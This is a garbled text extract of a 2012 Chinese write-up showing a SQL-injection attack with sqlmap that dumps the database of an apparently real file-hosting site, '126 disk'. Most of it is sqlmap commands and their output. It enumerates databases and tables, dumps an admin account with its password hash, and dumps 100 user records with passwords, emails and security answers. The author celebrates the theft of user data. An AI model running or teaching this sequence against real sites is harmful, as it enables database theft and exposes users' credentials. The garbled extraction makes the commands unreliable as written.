SQLMAP注入拖库126网盘全纪实.pdf

SQLMAPSQLMAP 注入拖库过程注入拖库过程 冰锋刺客 2012 5 31 SQLMAP 是一款开源的渗透测试程序 它可以自动探测和利用 SQL 注入漏洞来获得我们想 要的数据 我们可以利用它执行特定的命令 查看文件 获取各种数据 当然 最猥琐的是它 利用注入点拖库的速率还是灰常让人满意的 渗透开始 注入点 测试环境 BackTrack 5 SQLMAP 0 9 sqlmap py u v 1 dbs 列举数据库 126disk information schema sqlmap py u v 1 current db 当前数据库 126disk sqlmap py u v 1 users 列数据库用户 sqlmap py u v 1 current user 当前用户 sqlmap py u v 1 tables D 126disk 列举数据库126disk 的表名 获取表名 disk admin disk adminlog disk adminmsg disk collection disk count disk file disk gonggao disk guolv disk haoyou disk integral disk integrallog disk jubao disk link disk links disk message disk mulu disk search disk server disk tag disk type disk user disk userlog disk visitors disk zhuanji sqlmap py u v 1 columns T disk admin D 126disk 获取表 disk admin 的列名 sqlmap py u v 1 dump C id login pass user T disk admin D 126disk 获取表 disk admin 中的数据 包含列 id login pass user 1 9 admin 8e8df10cbce2ef46c3d25c3a5f7fe159 sqlmap py u v 1 columns T disk user D 126disk 获取表 disk user 的列名 当看到这些列名时 心中是莫名 的激动 里面可都是注册用户的 数据啊 sqlmap py u v 1 dump C id name pass email wenti daan T disk user D 126disk start 1 stop 100 获取表 disk user 的前100条数据 包含 id name pass email wenti daan 这里已经开始拖库 了 SQLMAP 是非常人性化的 它会将获取的数据存储在 pentest web scanners sqlmap output 补充 在获取数据的过程中会询问是否破解 HASH 密码 这里选择 n 我们不急于破解密文 参考资料 注 本文没打什么马赛克 因为本人